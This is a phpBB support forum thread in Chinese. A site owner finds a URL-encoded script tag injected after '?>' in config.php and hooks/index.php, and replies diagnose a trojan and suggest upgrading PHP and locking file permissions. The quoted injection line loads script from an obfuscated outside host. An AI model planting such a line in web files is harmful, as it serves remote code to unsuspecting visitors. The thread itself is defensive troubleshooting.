部分檔案出現奇怪代碼

phpBB Installation & Usage Support
phpBB 3 安裝於各類型作業平台之問題討論;外掛問題,請到相關版面依發問格式發表!
(發表文章請按照公告格式發表,違者砍文)

版主: 版主管理群

版面規則
本區是討論關於 phpBB 3.0.X 架設安裝上的問題,只要有安裝任何外掛,請到外掛討論相關版面按照公告格式發表。
(發表文章請按照公告格式發表,違者砍文)
主題已鎖定
StandardGr
星球普通子民
星球普通子民
文章: 30
註冊時間: 2008-11-12 04:17

部分檔案出現奇怪代碼

文章 StandardGr »

 

今天凌晨約三點多時網站首頁上頭出現了幾行 Debug 的訊息,然後首頁整個亂成一團
主要就是在 /includes/session.php 裡第 942 行出現問題

代碼: 選擇全部

		header('Set-Cookie: ' . $name_data . (($cookietime) ? '; expires=' . $expire : '') . '; path=' . $config['cookie_path'] . $domain . ((!$config['cookie_secure']) ? '' : '; secure') . '; HttpOnly', false);
	}
出問題的檔案為 /config.php /includes/hooks/index.php
其中 /config.php 在第 17 行原本是『?>』結束,卻變成以下

代碼: 選擇全部

?><script src=http://%77%76%67%34%2E%63%6E></script>
而 /includes/hooks/index.php 也在第 250 行的『?>』後面被加入了上述的 script



剛剛手動去除這兩個錯誤時,首頁看起來就算是正常了(尚未再發現錯誤)
請問這是什麼樣的原因會突然產生那個 script 呢?
因為先前也因為站上的檔案老是會自動產生奇怪的代碼讓首頁整個空白

感謝您熱心的答覆,謝謝你

 
##### 以下為 '基本的發問格式' #####
●主機作業系統:Windows (Xp、Sp2)
●快速架站程式:
●免費空間連結:
●您的上網方式:中華電信ADSL
●您安裝的程式:appserv-win32-2.4.8
●您的 phpBB 版本:phpBB 3.0.2
●您的 domain (網域名稱) : xxking.com
●您的 phpBB 連結網址: http://yanny.xxking.com
##### 以上為 '基本的發問格式' #####
小竹子
竹貓星球大統領
竹貓星球大統領
文章: 4596
註冊時間: 2001-10-29 22:13
來自: 竹貓星球
聯繫:

Re: 部分檔案出現奇怪代碼

文章 小竹子 »

看起來像是被植入木馬,請問你的空間是付費還是免費? PHP 的版本是 5.X 嗎?
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
StandardGr
星球普通子民
星球普通子民
文章: 30
註冊時間: 2008-11-12 04:17

Re: 部分檔案出現奇怪代碼

文章 StandardGr »

 

是付費空間的:http://www.bobi.com.tw/index.ASP

PHP版本為:4.3.11

討論區版本為:3.0.2

 
##### 以下為 '基本的發問格式' #####
●主機作業系統:Windows (Xp、Sp2)
●快速架站程式:
●免費空間連結:
●您的上網方式:中華電信ADSL
●您安裝的程式:appserv-win32-2.4.8
●您的 phpBB 版本:phpBB 3.0.2
●您的 domain (網域名稱) : xxking.com
●您的 phpBB 連結網址: http://yanny.xxking.com
##### 以上為 '基本的發問格式' #####
小竹子
竹貓星球大統領
竹貓星球大統領
文章: 4596
註冊時間: 2001-10-29 22:13
來自: 竹貓星球
聯繫:

Re: 部分檔案出現奇怪代碼

文章 小竹子 »

PHP 的版本太舊了..建議請主機商升級到 PHP 5.X
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
頭像
心靈捕手
默默耕耘的老師
默默耕耘的老師
文章: 8540
註冊時間: 2004-04-30 01:54
來自: Taiwan

Re: 部分檔案出現奇怪代碼

文章 心靈捕手 »

StandardGr 寫: 

是付費空間的:http://www.bobi.com.tw/index.ASP

PHP版本為:4.3.11

討論區版本為:3.0.2

 
建議您:
1. 請求付費空間升級 PHP 為 5.X 版.
2. 將 config.php 的權限設為 "唯讀".
參考連結:
http://phpbb-tw.net/phpbb/viewtopic.php ... 76#p271276
施比受有福,祝福您好運! ^_^
歡迎光臨★★心靈捕手★★ :: 討論區
https://wang5555.dnsfor.me/phpBB3/
StandardGr
星球普通子民
星球普通子民
文章: 30
註冊時間: 2008-11-12 04:17

Re: 部分檔案出現奇怪代碼

文章 StandardGr »

 

好,我再連絡廠商看看

至於 config 的屬性它好像無法更改的樣子

圖檔

更動後出現

圖檔

非常感謝二位的指導! :-)

 
##### 以下為 '基本的發問格式' #####
●主機作業系統:Windows (Xp、Sp2)
●快速架站程式:
●免費空間連結:
●您的上網方式:中華電信ADSL
●您安裝的程式:appserv-win32-2.4.8
●您的 phpBB 版本:phpBB 3.0.2
●您的 domain (網域名稱) : xxking.com
●您的 phpBB 連結網址: http://yanny.xxking.com
##### 以上為 '基本的發問格式' #####
主題已鎖定

回到「[3.0.x] 安裝與使用」